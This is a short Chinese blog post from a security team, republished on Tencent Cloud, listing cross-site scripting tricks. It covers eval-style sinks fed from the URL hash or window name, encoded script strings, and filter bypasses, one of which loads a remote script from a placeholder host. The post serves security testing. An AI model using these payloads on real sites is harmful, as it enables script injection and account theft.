香香的xss小记录（一）

ChaMd5安全团队

发布于 2018-03-29 15:18:17

9880

发布于 2018-03-29 15:18:17

文章被收录于专栏：ChaMd5安全团队

0x00 前言

总结的一些xss的技巧（可能会持续更新），愿大佬勿喷，还有什么方法，大佬记得分享啊。有什么看不惯的错误请在本文留言，谢谢。

0x01 我认为最短的执行任意js代码

eval(name);

poc：

<iframe src='http://localhost/?xss=eval(name);' name='js-code'>

0x02 类似eval的方法

setTimeout(location.hash.slice(1))

setInterval(location.hash.slice(1))

Function(location.hash.slice(1))(1)

jQuery.globalEval(location.hash.slice(1))

document.write`\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e`

document.getElementById('xx').innerHTML=`\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e`

0x03 当括号被过滤执行任意payload的方法

document.write`\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e`

<svg/onload="location='javascript:/*'%2blocation.hash">
锚点后接*/jscode

0x04 事件被过滤时执行任意payload

<link rel=import href=\\payload.com>

<script src=\\payload.com></script>

<iframe srcdoc="&#x3C;&#x69;&#x6D;&#x67;&#x20;&#x73;&#x72;&#x63;&#x3D;&#x78;&#x20;&#x6F;&#x6E;&#x65;&#x72;&#x72;&#x6F;&#x72;&#x3D;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x64;&#x6F;&#x6D;&#x61;&#x69;&#x6E;&#x29;&#x3E;"></iframe>

本文参与腾讯云自媒体同步曝光计划，分享自微信公众号。

原始发表：2017-11-22，如有侵权请联系 cloudcommunity@tencent.com 删除

安全漏洞

本文分享自 ChaMd5安全团队微信公众号，前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体同步曝光计划，欢迎热爱写作的你一起参与！

安全漏洞

登录后参与评论

0 条评论

热度

香香的xss小记录（一）

香香的xss小记录（一）

社区

活动

资源

关于

腾讯云开发者

热门产品

热门推荐

更多推荐